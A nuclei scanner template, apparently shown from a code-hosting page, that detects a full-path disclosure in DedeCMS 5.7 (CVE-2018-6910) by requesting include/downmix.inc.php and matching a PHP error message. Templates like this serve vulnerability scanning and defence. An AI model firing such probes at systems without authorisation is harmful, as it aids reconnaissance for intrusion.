nuclei-templates/cves/2018/CVE-2018-6910.yaml

37 lines
960 B
YAML

id: CVE-2018-6910
info:
name: DedeCMS 5.7 path disclosure
author: pikpikcu
severity: high
description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-6910
- https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
- https://kongxin.gitbook.io/dedecms-5-7-bug/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-6910
cwe-id: CWE-668
tags: cve,cve2018,dedecms
requests:
- method: GET
path:
- "{{BaseURL}}/include/downmix.inc.php"
matchers-condition: and
matchers:
- type: word
words:
- "downmix.inc.php"
- "Call to undefined function helper()"
part: body
condition: and
- type: status
status:
- 200